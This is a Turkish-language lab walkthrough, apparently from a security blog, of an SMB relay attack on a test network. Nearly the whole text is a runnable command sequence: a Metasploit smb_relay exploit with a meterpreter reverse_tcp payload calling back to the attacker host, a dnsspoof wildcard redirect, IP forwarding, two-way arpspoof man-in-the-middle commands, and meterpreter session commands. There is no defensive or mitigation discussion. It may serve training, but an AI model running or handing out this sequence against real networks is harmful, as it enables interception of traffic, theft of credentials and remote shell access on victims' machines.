Smb-Relay saldırısı

Bugünün farkındalığı, Yarının Güvenliğidir.

Smb-Relay saldırısı

msfconsole’u başlatın ve SMB Relay exploit’ini yapılandırın:
Komutlar:

msfconsole

use exploit/windows/smb/smb_relay

set SRVHOST 172.16.5.101

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 172.16.5.101

set SMBHOST 172.16.5.10

exploit

Kurbanı, domaindeki herhangi bir ana bilgisayara yapılan her SMB bağlantısında Metasploit sistemimize yönlendirmek için dnsspoof’u yapılandırın: sportsfoo.com alan adındaki tüm alt alan adlarını saldırgan makinemize yönlendiren sahte bir DNS girişiyle bir dosya oluşturun.
Komut:

echo “172.16.5.101 *.sportsfoo.com” > dns

dnsspoof’u çalıştırmaya hazırız:
Komut:

dnsspoof -i eth1 -f dns

ARP Spoofing tekniğini kullanarak MiTM (Ortadaki Adam) saldırısını etkinleştirin. Amacımız, 172.16.5.5’teki kurban (Windows 7) ile 172.16.5.1’deki varsayılan ağ geçidi arasındaki trafiği zehirlemektir. Böylece, zaten çalışan dnsspoof’u kullanarak trafiği manipüle edebiliriz. ARP Spoofing saldırısını gerçekleştirmek için IP yönlendirmeyi aşağıdaki gibi etkinleştirmemiz gerekiyor:
Komut:

echo 1 > /proc/sys/net/ipv4/ip_forward

İki ayrı terminalde 172.16.5.5 ve 172.16.5.1’e karşı ARP Spoof saldırısını başlatmak için aşağıdaki komutları kullanın:

arpspoof -i eth1 -t 172.16.5.5 172.16.5.1

arpspoof -i eth1 -t 172.16.5.1 172.16.5.5

Not: Daha fazla ayrıntı için ARP zehirleme saldırısı, Poisoning & Sniffing (Lab10) içinde ele alınmaktadır. Böylece, kurban (Windows 7) her SMB bağlantısı başlattığında, dnsspoof ve ARP Spoof saldırısıyla birlikte, aranan DNS adresinin saldırgan makinede barındırıldığına dair sahte DNS yanıtları oluşturur:

Örneğin, önceki sonuçlardan, Windows 7’nin [\fileserver.sportsfoo.com\AnyShare] için bir SMB bağlantısı başlattığını varsayalım. Gerçek IP adresi olan fileserver.sportsfoo.com yerine, saldırganın IP’si olan 172.16.5.101’i alır. Sonuç olarak, SMB bağlantısı [\172.16.5.101\AnyShare] adresine yönlendirilir. Metasploit’te, her gelen SMB bağlantısı için SMB Relay exploit’i, SMB hash’lerini (kimlik bilgilerini) alır ve ardından bunları kullanarak hedef makinede (SMB Relay exploit’inin SMB HOST alanında ayarlandığı gibi 172.16.5.10’da) bir shell elde eder.

SMB Relay saldırısı başarılı oldu ve hedef makinede bir meterpreter oturumu elde edebildik. Bu, dosya sunucusunda ve hedef makinede kullanılan kimlik bilgilerinin aynı olması sayesinde mümkün oldu. Meterpreter oturumuyla etkileşim kurun.

sessions
sessions -i 1
getuid

Yorum yapılmamış

Yorumunuzu ekleyin